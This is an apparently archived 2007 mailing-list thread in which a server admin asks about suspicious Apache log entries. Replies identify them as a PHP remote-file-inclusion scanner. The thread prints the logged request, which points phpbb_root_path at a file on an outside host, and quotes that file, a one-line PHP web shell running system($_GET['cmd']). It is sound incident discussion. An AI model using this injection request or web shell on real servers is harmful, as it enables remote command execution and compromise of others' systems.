On Wednesday 25 April 2007 14:48, Marcus Meissner wrote:
> On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
> > Hello,
> >
> > I found these errors in our web logs and it appears that either
> > there is a PHP attack on the apache site or perhaps a kit on the
> > server?
> >
> > Errors below (profanity not mine);
> >
> >
> > 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET
> > /components/com_forum/download.php?phpbb_root_path=http://203.198.6
> >8.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking
> > Scanner"
>
> Looks like some kind of PHP include attack scanner, against lots of
> PHP apps.
It looks like an indirect injection exploit--getting the hacker's code
to run in the environment of the server to which it is sent. Is PHP
really so trusting as to load and execute remote code in the manner
suggested by this attack?
Similar things are possible with database applications when the author
naively uses string concatenation to combine template query fragments
with user-supplied parameters.
> M.txt contains:
> <?
> system($_GET['cmd']);
> die ("Morfeus hacked you");
> ?>
Looks like:
a) Morfeus doesn't spell very well.
b) Morfeus knows only Windows.
c) Morfeus is kind of rude.
> ciao, Marcus
Randall Schulz
--
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
